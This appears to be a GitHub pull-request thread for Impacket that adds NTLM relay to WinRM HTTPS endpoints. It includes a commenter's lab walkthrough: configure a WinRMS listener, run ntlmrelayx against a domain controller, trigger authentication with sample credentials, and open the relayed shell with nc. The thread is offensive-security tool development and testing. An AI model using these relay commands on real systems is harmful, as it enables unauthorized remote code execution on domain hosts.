impacket icon indicating copy to clipboard operation
impacket copied to clipboard
verified publisher icon fortra

Add new relay capabilities to the WinRM HTTPS endpoint

Open Dfte opened this issue 8 months ago • 6 comments

This PR adds a new relay capability allowing us to relay SMB/LDAP/HTTP NTLM (v1 or unsecured ones) authentications to the WinRM HTTPS endpoint.

This endpoint is not configured on a default server installation but it is not protected by Channel Binding once configured by a sysadmin which makes it a possible great relay alternative for remote code executino.

Default action creates an interactive TCP shell that can be used via NC (socks is also implemented):

image

This PR was created by Joseph Mondloch (jmk@foofus) and me :)

Dfte avatar Apr 14 '25 09:04 Dfte

That's some crazy stuff, good job @Dfte!

NeffIsBack avatar Apr 14 '25 23:04 NeffIsBack

Updates needed. I realized far too late that this technique was working on my environements because NTLMv1 was enabled. This technique won't work for NTLMv2 as is. Yet, I believe this can still be an interesting use case to add to Impacket as this module can still be used if:

  • NTLMv1 is activated (natively or via downgrade attacks) ;
  • MITM allows redirecting legitimate WinRM connections to our listener ;
  • WinRM listener is configured to not support CBT (CBT=None).

Once again, sorry for the misinformation and feel free to add/deny this feature :)

Dfte avatar Apr 17 '25 16:04 Dfte

Have seen the error which made me realize I forgot to include latest WinRMrelayserver upgrades. And I fixed the spelling issues as well so hopefully I'll push all the updates in a couple of days :)

Dfte avatar Apr 21 '25 15:04 Dfte

At this point I have added:

  • The WinRMRelayServer and WinRMSRelayServer which allows catching NTLM authentication over these two protocols ;
  • The WinRMAttack which allows relaying to:
    • Anything if NTLMv1 is used ;
    • WinRMS endpoints if configured with CBT=None

:P

Dfte avatar Apr 22 '25 14:04 Dfte

For anybody who wants to play around with this PR:

Setup WinRMS.

New-SelfSignedCertificate -Subject 'CN=dc01.corp.local' -TextExtension '2.5.29.37={text}1.3.6.1.5.5.7.3.1'c
winrm create 'winrm/config/Listener?Address=*+Transport=HTTPS' '@{Hostname="dc01.corp.local"; CertificateThumbprint="9592A6D026E71AFFA17049D16D74AA7C47A89788"}'
New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction 'Inbound' -LocalPort 5986 -Protocol 'TCP' -Action 'Allow' -Program 'System'

Start relay server.

ntlmrelayx.py -debug --no-smb-server --no-wcf-server --no-raw-server -t winrms://dc01.corp.local

Trigger authentication.

curl http://localhost -u 'corp\administrator:passw0rd' --ntlm

Get shell.

nc -v 127.0.0.1 11000

dadevel avatar Apr 27 '25 12:04 dadevel

Hey @anadrianmanrique any news on this one ? Considering it doesn't change any files or structures but simply adds new ones, can we merge that?

Dfte avatar Jun 17 '25 07:06 Dfte

@Dfte sorry for not answering, I've been OOO last week. I think this is a great feature besides limitations with NTLMv2. We are planning to integrate it in the context of 0.13 version, which is soon to be released. Glad to see that you reopened it #1987

anadrianmanrique avatar Jun 22 '25 23:06 anadrianmanrique